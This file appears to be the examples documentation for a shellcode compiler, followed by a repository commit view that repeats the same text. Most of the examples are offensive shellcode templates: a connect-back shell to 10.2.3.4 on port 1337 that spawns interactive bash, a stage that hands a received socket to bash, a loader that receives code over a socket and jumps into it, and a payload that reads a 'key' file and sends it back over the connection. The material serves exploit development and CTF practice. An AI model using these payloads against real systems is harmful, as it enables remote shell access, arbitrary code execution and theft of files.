binaryninja/personal/scc-docs/examples.txt

Shellcode Compiler Examples
===========================
:toc: 

The following are short examples of how to use the Shellcode Compiler to solve
common shellcoding tasks.

Resolve and call Windows functions
----------------------------------
SCC supports the ability to dynamically resolve and call windows functions for
you with the right syntax. The following simple example is a popup displaying
hello world using MessageBoxA.

---------------------------------------
int __stdcall MessageBoxA(HANDLE hwnd, const char* msg, const char* title, uint32_t flags) __import("user32");

int main()
{
    MessageBoxA(NULL, "Hello", "Hello World.", 0);
    return 0;
}
---------------------------------------

Connect-back Shell
------------------
The following code will connect to 10.2.3.4 on port 1337 with an interactive
bash session.

---------------------------------------
void main()
{
	int s = create_tcp4_connection(IPV4_ADDR(10, 2, 3, 4), 1337);
	redirect_io(s);
	interactive_bash();
}
---------------------------------------

Passing socket descriptor from previous stage
---------------------------------------------
The main() function can take arguments, which are to be passed on the stack from
right to left (C calling convention).  When you transition to this shellcode, use
a standard call instruction with the socket pushed onto the stack.

---------------------------------------
void main(int sock)
{
	redirect_io(sock);
	interactive_bash();
}
---------------------------------------

Staged shellcode
----------------
You can use the computed goto syntax to transition to a new, larger shellcode buffer.
The following example allocates a new buffer on the heap for shellcode of an arbitrary size.

---------------------------------------
void main(int sock)
{
	int len;
	recv(sock, &len, 4, 0);

	void* code = malloc(len);
	recv_all(sock, code, len, 0);
	goto *code;
}
---------------------------------------

Read a file
-----------
The following shellcode reads a small file called `key` and sends it back over file
descriptor 4, which is typically the incoming connection on a forking server.

---------------------------------------
void main()
{
	char data[64];
	int fd = open("key", O_RDONLY, 0);
	int len = read(fd, data, 64);
	write(4, data, len);
}
---------------------------------------
Added binja personal 2019-04-03 14:46:40 +01:00			`Shellcode Compiler Examples`
			`===========================`
			`:toc:`

			`The following are short examples of how to use the Shellcode Compiler to solve`
			`common shellcoding tasks.`

			`Resolve and call Windows functions`
			`----------------------------------`
			`SCC supports the ability to dynamically resolve and call windows functions for`
			`you with the right syntax. The following simple example is a popup displaying`
			`hello world using MessageBoxA.`

			`---------------------------------------`
			`int __stdcall MessageBoxA(HANDLE hwnd, const char* msg, const char* title, uint32_t flags) __import("user32");`

			`int main()`
			`{`
			`MessageBoxA(NULL, "Hello", "Hello World.", 0);`
			`return 0;`
			`}`
			`---------------------------------------`

			`Connect-back Shell`
			`------------------`
			`The following code will connect to 10.2.3.4 on port 1337 with an interactive`
			`bash session.`

			`---------------------------------------`
			`void main()`
			`{`
			`int s = create_tcp4_connection(IPV4_ADDR(10, 2, 3, 4), 1337);`
			`redirect_io(s);`
			`interactive_bash();`
			`}`
			`---------------------------------------`

			`Passing socket descriptor from previous stage`
			`---------------------------------------------`
			`The main() function can take arguments, which are to be passed on the stack from`
			`right to left (C calling convention). When you transition to this shellcode, use`
			`a standard call instruction with the socket pushed onto the stack.`

			`---------------------------------------`
			`void main(int sock)`
			`{`
			`redirect_io(sock);`
			`interactive_bash();`
			`}`
			`---------------------------------------`

			`Staged shellcode`
			`----------------`
			`You can use the computed goto syntax to transition to a new, larger shellcode buffer.`
			`The following example allocates a new buffer on the heap for shellcode of an arbitrary size.`

			`---------------------------------------`
			`void main(int sock)`
			`{`
			`int len;`
			`recv(sock, &len, 4, 0);`

			`void* code = malloc(len);`
			`recv_all(sock, code, len, 0);`
			`goto *code;`
			`}`
			`---------------------------------------`

			`Read a file`
			`-----------`
			The following shellcode reads a small file called `key` and sends it back over file
			`descriptor 4, which is typically the incoming connection on a forking server.`

			`---------------------------------------`
			`void main()`
			`{`
			`char data[64];`
			`int fd = open("key", O_RDONLY, 0);`
			`int len = read(fd, data, 64);`
			`write(4, data, len);`
			`}`
			`---------------------------------------`